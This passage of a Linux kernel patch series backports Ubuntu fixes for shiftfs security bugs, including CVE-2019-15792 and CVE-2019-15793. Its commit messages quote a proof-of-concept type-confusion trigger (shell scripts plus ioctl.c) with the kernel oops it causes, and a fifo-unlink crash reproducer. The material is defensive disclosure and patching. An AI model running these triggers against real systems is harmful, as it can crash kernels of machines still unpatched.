<mpagano@gentoo.org> ---- - fs/shiftfs.c | 35 +++++++++++++++++++++-------------- - 1 file changed, 21 insertions(+), 14 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 0d6ce377b07c..9a6a7ad50b90 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1389,8 +1389,7 @@ static inline bool is_btrfs_snap_ioctl(int cmd) - return false; - } - --static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd, -- void __user *arg, -+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg, - struct btrfs_ioctl_vol_args *v1, - struct btrfs_ioctl_vol_args_v2 *v2) - { -@@ -1404,7 +1403,6 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd, - else - ret = copy_to_user(arg, v2, sizeof(*v2)); - -- fdput(lfd); - __close_fd(current->files, fd); - kfree(v1); - kfree(v2); -@@ -1415,11 +1413,11 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd, - static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - struct btrfs_ioctl_vol_args **b1, - struct btrfs_ioctl_vol_args_v2 **b2, -- struct fd *lfd, - int *newfd) - { - int oldfd, ret; - struct fd src; -+ struct fd lfd = {}; - struct btrfs_ioctl_vol_args *v1 = NULL; - struct btrfs_ioctl_vol_args_v2 *v2 = NULL; - -@@ -1444,18 +1442,28 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - if (!src.file) - return -EINVAL; - -- ret = shiftfs_real_fdget(src.file, lfd); -- fdput(src); -- if (ret) -+ ret = shiftfs_real_fdget(src.file, &lfd); -+ if (ret) { -+ fdput(src); - return ret; -+ } -+ -+ /* -+ * shiftfs_real_fdget() does not take a reference to lfd.file, so -+ * take a reference here to offset the one which will be put by -+ * __close_fd(), and make sure that reference is put on fdput(lfd). -+ */ -+ get_file(lfd.file); -+ lfd.flags |= FDPUT_FPUT; -+ fdput(src); - -- *newfd = get_unused_fd_flags(lfd->file->f_flags); -+ *newfd = get_unused_fd_flags(lfd.file->f_flags); - if (*newfd < 0) { -- fdput(*lfd); -+ fdput(lfd); - return *newfd; - } - -- fd_install(*newfd, lfd->file); -+ fd_install(*newfd, lfd.file); - - if (cmd == BTRFS_IOC_SNAP_CREATE) { - v1->fd = *newfd; -@@ -1468,7 +1476,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - } - - if (ret) -- shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2); -+ shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2); - - return ret; - } -@@ -1482,13 +1490,12 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - int newfd = -EBADF; - long err = 0, ret = 0; - void __user *argp = (void __user *)arg; -- struct fd btrfs_lfd = {}; - struct super_block *sb = file->f_path.dentry->d_sb; - struct btrfs_ioctl_vol_args *btrfs_v1 = NULL; - struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL; - - ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2, -- &btrfs_lfd, &newfd); -+ &newfd); - if (ret < 0) - return ret; - -@@ -1511,7 +1518,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - fdput(lowerfd); - - out_restore: -- err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp, -+ err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp, - btrfs_v1, btrfs_v2); - if (!ret) - ret = err; --- -2.39.2 - -From 187086d532fb6b5cb7785ebcb5438e170f136491 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Fri, 1 Nov 2019 14:19:16 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent type confusion -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1850867 - -Verify filesystem type in shiftfs_real_fdget(). - -Quoting Jann Horn: - #################### Bug 2: Type confusion #################### - - shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks - passes the resulting file* into shiftfs_real_fdget(), which does this: - - static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) - { - struct shiftfs_file_info *file_info = file->private_data; - struct file *realfile = file_info->realfile; - - lowerfd->flags = 0; - lowerfd->file = realfile; - - /* Did the flags change since open? */ - if (unlikely(file->f_flags & ~lowerfd->file->f_flags)) - return shiftfs_change_flags(lowerfd->file, file->f_flags); - - return 0; - } - - file->private_data is a void* that points to a filesystem-dependent type; and - some filesystems even use it to store a type-cast number instead of a pointer. - The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast. - - As a PoC, here I'm causing a type confusion between struct shiftfs_file_info - (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at - offset 0x10), and I use that to cause a memory dereference somewhere around - 0x4242: - - ======================================= - user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh - #!/bin/sh - sync - unshare -mUr ./run2.sh - user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh - #!/bin/sh - set -e - - mkdir -p mnt/tmpfs - mkdir -p mnt/shiftfs - mount -t tmpfs none mnt/tmpfs - mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs - mount|grep shift - gcc -o ioctl ioctl.c -Wall - ./ioctl - user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c - #include <sys/ioctl.h> - #include <fcntl.h> - #include <err.h> - #include <unistd.h> - #include <linux/btrfs.h> - #include <sys/mman.h> - - int main(void) { - // make our vmacache sequence number something like 0x4242 - for (int i=0; i<0x4242; i++) { - void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ, - MAP_ANONYMOUS|MAP_PRIVATE, -1, 0); - if (x == MAP_FAILED) err(1, "mmap vmacache seqnum"); - munmap(x, 0x1000); - } - - int root = open("mnt/shiftfs", O_RDONLY); - if (root == -1) err(1, "open shiftfs root"); - int foofd = open("/proc/self/environ", O_RDONLY); - if (foofd == -1) err(1, "open foofd"); - // trigger the confusion - struct btrfs_ioctl_vol_args iocarg = { - .fd = foofd - }; - ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg); - } - user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh - none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000) - /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2) - [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289 - [ 348.105060] #PF: supervisor read access in kernel mode - [ 348.106573] #PF: error_code(0x0000) - not-present page - [ 348.108102] PGD 0 P4D 0 - [ 348.108871] Oops: 0000 [#1] SMP PTI - [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu - [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014 - [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs] - [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75 - [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246 - [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249 - [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004 - [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150 - [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401 - [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004 - [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000 - [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 - [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0 - [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 - [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 - [ 348.143545] Call Trace: - [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs] - [ 348.145562] do_vfs_ioctl+0x407/0x670 - [ 348.146620] ? putname+0x4a/0x50 - [ 348.147556] ksys_ioctl+0x67/0x90 - [ 348.148514] __x64_sys_ioctl+0x1a/0x20 - [ 348.149593] do_syscall_64+0x5a/0x130 - [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9 - [ 348.152108] RIP: 0033:0x7f77fa76767b - [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48 - [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010 - [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b - [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003 - [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000 - [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100 - [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000 - [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk - [ 348.188617] CR2: 0000000000004289 - [ 348.189586] ---[ end trace dad859a1db86d660 ]--- - [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs] - [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75 - [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246 - [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249 - [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004 - [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150 - [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401 - [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004 - [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000 - [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 - [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0 - [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 - [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 - Killed - user@ubuntu1910vm:~/shiftfs_confuse$ - -Reported-by: Jann Horn <jannh@google.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -[ saf: use f_op->open instead as special inodes in shiftfs sbs - will not use shiftfs open f_ops ] -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> - -CVE-2019-15792 - -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 33 +++++++++++++++++++-------------- - 1 file changed, 19 insertions(+), 14 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 9a6a7ad50b90..897e0163005e 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1087,20 +1087,6 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags) - return 0; - } - --static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) --{ -- struct file *realfile = file->private_data; -- -- lowerfd->flags = 0; -- lowerfd->file = realfile; -- -- /* Did the flags change since open? */ -- if (unlikely(file->f_flags & ~lowerfd->file->f_flags)) -- return shiftfs_change_flags(lowerfd->file, file->f_flags); -- -- return 0; --} -- - static int shiftfs_open(struct inode *inode, struct file *file) - { - struct file *realfile; -@@ -1187,6 +1173,25 @@ static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb) - return flags; - } - -+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) -+{ -+ struct file *realfile; -+ -+ if (file->f_op->open != shiftfs_open && -+ file->f_op->open != shiftfs_dir_open) -+ return -EINVAL; -+ -+ realfile = file->private_data; -+ lowerfd->flags = 0; -+ lowerfd->file = realfile; -+ -+ /* Did the flags change since open? */ -+ if (unlikely(file->f_flags & ~lowerfd->file->f_flags)) -+ return shiftfs_change_flags(lowerfd->file, file->f_flags); -+ -+ return 0; -+} -+ - static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter) - { - struct file *file = iocb->ki_filp; --- -2.39.2 - -From 7bb96158915054edeee67b13212cd19b8fff54bd Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Fri, 1 Nov 2019 13:35:25 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Correct id translation for lower fs - operations -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1850867 - -Several locations which shift ids translate user/group ids before -performing operations in the lower filesystem are translating -them into init_user_ns, whereas they should be translated into -the s_user_ns for the lower filesystem. This will result in using -ids other than the intended ones in the lower fs, which will -likely not map into the shifts s_user_ns. - -Change these sites to use shift_k[ug]id() to do a translation -into the s_user_ns of the lower filesystem. - -Reported-by: Jann Horn <jannh@google.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> - -CVE-2019-15793 - -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 43 +++++++++++++++++++++++-------------------- - 1 file changed, 23 insertions(+), 20 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 897e0163005e..04fba4689eb6 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -83,12 +83,27 @@ static inline void shiftfs_revert_object_creds(const struct cred *oldcred, - put_cred(newcred); - } - -+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to, -+ kuid_t kuid) -+{ -+ uid_t uid = from_kuid(from, kuid); -+ return make_kuid(to, uid); -+} -+ -+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to, -+ kgid_t kgid) -+{ -+ gid_t gid = from_kgid(from, kgid); -+ return make_kgid(to, gid); -+} -+ - static int shiftfs_override_object_creds(const struct super_block *sb, - const struct cred **oldcred, - struct cred **newcred, - struct dentry *dentry, umode_t mode, - bool hardlink) - { -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; - kuid_t fsuid = current_fsuid(); - kgid_t fsgid = current_fsgid(); - -@@ -100,8 +115,8 @@ static int shiftfs_override_object_creds(const struct super_block *sb, - return -ENOMEM; - } - -- (*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid)); -- (*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid)); -+ (*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid); -+ (*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid); - - if (!hardlink) { - int err = security_dentry_create_files_as(dentry, mode, -@@ -117,20 +132,6 @@ static int shiftfs_override_object_creds(const struct super_block *sb, - return 0; - } - --static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to, -- kuid_t kuid) --{ -- uid_t uid = from_kuid(from, kuid); -- return make_kuid(to, uid); --} -- --static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to, -- kgid_t kgid) --{ -- gid_t gid = from_kgid(from, kgid); -- return make_kgid(to, gid); --} -- - static void shiftfs_copyattr(struct inode *from, struct inode *to) - { - struct user_namespace *from_ns = from->i_sb->s_user_ns; -@@ -758,6 +759,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - struct iattr newattr; - const struct cred *oldcred; - struct super_block *sb = dentry->d_sb; -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; - int err; - - err = setattr_prepare(dentry, attr); -@@ -765,8 +767,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - return err; - - newattr = *attr; -- newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid)); -- newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid)); -+ newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid); -+ newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid); - - /* - * mode change is for clearing setuid/setgid bits. Allow lower fs -@@ -1356,6 +1358,7 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb, - const struct cred **oldcred, - struct cred **newcred) - { -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; - kuid_t fsuid = current_fsuid(); - kgid_t fsgid = current_fsgid(); - -@@ -1367,8 +1370,8 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb, - return -ENOMEM; - } - -- (*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid)); -- (*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid)); -+ (*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid); -+ (*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid); - - /* clear all caps to prevent bypassing capable() checks */ - cap_clear((*newcred)->cap_bset); --- -2.39.2 - -From f140d37a80df29e1746b9ba9a29cf5b505c6a70f Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Fri, 17 Jan 2020 16:17:06 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent lower dentries from going - negative during unlink -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1860041 - -All non-special files (For shiftfs this only includes fifos and - for -this case - unix sockets - since we don't allow character and block -devices to be created.) go through shiftfs_open() and have their dentry -pinned through this codepath preventing it from going negative. But -fifos don't use the shiftfs fops but rather use the pipefifo_fops which -means they do not go through shiftfs_open() and thus don't have their -dentry pinned that way. Thus, the lower dentries for such files can go -negative on unlink causing segfaults. The following C program can be -used to reproduce the crash: - - #include <stdio.h> - #include <fcntl.h> - #include <unistd.h> - #include <sys/types.h> - #include <sys/stat.h> - #include <unistd.h> - #include <stdlib.h> - - int main(int argc, char *argv[]) - { - struct stat stat; - - unlink("./bbb"); - - int ret = mknod("./bbb", S_IFIFO|0666, 0); - if (ret < 0) - exit(1); - - int fd = open("./bbb", O_RDWR); - if (fd < 0) - exit(2); - - if (unlink("./bbb")) - exit(4); - - fstat(fd, &stat); - - return 0; - } - -Similar to ecryptfs we need to dget() the lower dentry before calling -vfs_unlink() on it and dput() it afterwards. - -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Link: https://travis-ci.community/t/arm64-ppc64le-segfaults/6158/3 -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 2 ++ - 1 file changed, 2 insertions(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 04fba4689eb6..3623d02b061e 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -583,6 +583,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - int err; - const struct cred *oldcred; - -+ dget(lowerd); - oldcred = shiftfs_override_creds(dentry->d_sb); - inode_lock_nested(loweri, I_MUTEX_PARENT); - if (rmdir) -@@ -602,6 +603,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - inode_unlock(loweri); - - shiftfs_copyattr(loweri, dir); -+ dput(lowerd); - - return err; - } --- -2.39.2 - -From c9d38b0997c70e60f89b31c83d1b7a1e375f28b1 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Fri, 10 Apr 2020 16:55:28 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: record correct creator credentials -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1872094 - -When shiftfs is nested we failed to be able to create any files or -access directories because we recorded the wrong creator credentials. We -need to record the credentials of the creator of the lowers mark mount -of shiftfs. Otherwise we aren't privileged wrt to the shiftfs layer in -the nesting case. This is similar to how we always record the user -namespace of the base filesystem. - -Suggested-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 17 +++++++++-------- - 1 file changed, 9 insertions(+), 8 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 3623d02b061e..5c39529d0a17 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -2020,6 +2020,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - * parent mark mountpoint. - */ - sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark; -+ sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred); - } else { - sbinfo->mnt = mntget(path.mnt); - dentry = dget(path.dentry); -@@ -2028,16 +2029,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - * are identical. - */ - sbinfo->passthrough_mark = sbinfo->passthrough; -- } - -- cred_tmp = prepare_creds(); -- if (!cred_tmp) { -- err = -ENOMEM; -- goto out_put_path; -+ cred_tmp = prepare_creds(); -+ if (!cred_tmp) { -+ err = -ENOMEM; -+ goto out_put_path; -+ } -+ /* Don't override disk quota limits or use reserved space. */ -+ cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE); -+ sbinfo->creator_cred = cred_tmp; - } -- /* Don't override disk quota limits or use reserved space. */ -- cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE); -- sbinfo->creator_cred = cred_tmp; - } else { - /* - * This leg executes if we're admin capable in the namespace, --- -2.39.2 - -From 485977eb4fb2701211275d28ca4fdbec87704a18 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Wed, 20 May 2020 13:44:27 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: let userns root destroy subvolumes - from other users -MIME-Version: 1.0 -Content-Type: text/plain; charset=UTF-8 -Content-Transfer-Encoding: 8bit -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1879688 - -Stéphane reported a bug found during NorthSec that makes heavy use of -shiftfs. When a subvolume or snapshot is created as userns root in the -container and then chowned to another user a delete as the root user -will fail. The reason for this is that we drop all capabilities as a -safety measure before calling btrfs ioctls. The only workable fix I -could think of is to retain the CAP_DAC_OVERRIDE capability for the -BTRFS_IOC_SNAP_DESTROY ioctl. All other solutions would be way more -invasive. - -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Cc: Seth Forshee <seth.forshee@canonical.com> -Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 14 ++++++++++++-- - 1 file changed, 12 insertions(+), 2 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 5c39529d0a17..5d88193b41db 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1356,7 +1356,7 @@ static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len, - return ret; - } - --static int shiftfs_override_ioctl_creds(const struct super_block *sb, -+static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb, - const struct cred **oldcred, - struct cred **newcred) - { -@@ -1381,6 +1381,16 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb, - cap_clear((*newcred)->cap_inheritable); - cap_clear((*newcred)->cap_permitted); - -+ if (cmd == BTRFS_IOC_SNAP_DESTROY) { -+ kuid_t kuid_root = make_kuid(sb->s_user_ns, 0); -+ /* -+ * Allow the root user in the container to remove subvolumes -+ * from other users. -+ */ -+ if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root)) -+ cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE); -+ } -+ - put_cred(override_creds(*newcred)); - return 0; - } -@@ -1513,7 +1523,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - if (ret) - goto out_restore; - -- ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred); -+ ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred); - if (ret) - goto out_fdput; - --- -2.39.2 - -From e090464bdd744306b3b766b2a675ee26e934f1ef Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Mon, 15 Jun 2020 15:16:11 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs -- Fix build errors from missing - fiemap definitions -Cc: mpagano@gentoo.org - -shiftfs FTBFS with 5.8-rc1: - - /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c: In function 'shiftfs_fiemap': - /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:13: error: dereferencing pointer to incomplete type 'struct fiemap_extent_info' - /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:26: error: 'FIEMAP_FLAG_SYNC' undeclared (first use in this function); did you mean 'FS_XFLAG_SYNC'? - -It seems that shiftfs was getting linux/fiemap.h included -indirectly before. Include it directly. - -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 1 + - 1 file changed, 1 insertion(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 5d88193b41db..f9a5c94a9793 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -20,6 +20,7 @@ - #include <linux/posix_acl.h> - #include <linux/posix_acl_xattr.h> - #include <linux/uio.h> -+#include <linux/fiemap.h> - - struct shiftfs_super_info { - struct vfsmount *mnt; --- -2.39.2 - -From 436cc946e1acb3833c41e6a7df3239f5f559369a Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Tue, 23 Jun 2020 19:46:16 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent ESTALE for LOOKUP_JUMP - lookups -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1872757 - -Users reported that creating temporary files shiftfs reports ESTALE. -This can be reproduced via: - -import tempfile -import os - -def test(): - with tempfile.TemporaryFile() as fd: - fd.write("data".encode('utf-8')) - # re-open the file to get a read-only file descriptor - return open(f"/proc/self/fd/{fd.fileno()}", "r") - -def main(): - fd = test() - fd.close() - -if __name__ == "__main__": - main() - -a similar issue was reported here: -https://github.com/systemd/systemd/issues/14861 - -Our revalidate methods were very opinionated about whether or not a -lower dentry was valid especially when it became unlinked we simply -invalidated the lower dentry which caused above bug to surface. This has -led to bugs where a ESTALE was returned for e.g. temporary files that -were created and directly re-opened afterwards through -/proc/<pid>/fd/<nr-of-deleted-file>. When a file is re-opened through -/proc/<pid>/fd/<nr> LOOKUP_JUMP is set and the vfs will revalidate via -d_weak_revalidate(). Since the file has been unhashed or even already -gone negative we'd fail the open when we should've succeeded. - -Reported-by: Christian Kellner <ckellner@redhat.com> -Reported-by: Evgeny Vereshchagin <evvers@ya.ru> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Cc: Seth Forshee <seth.forshee@canonical.com> -Link: https://github.com/systemd/systemd/issues/14861 -Signed-off-by: Seth Forshee 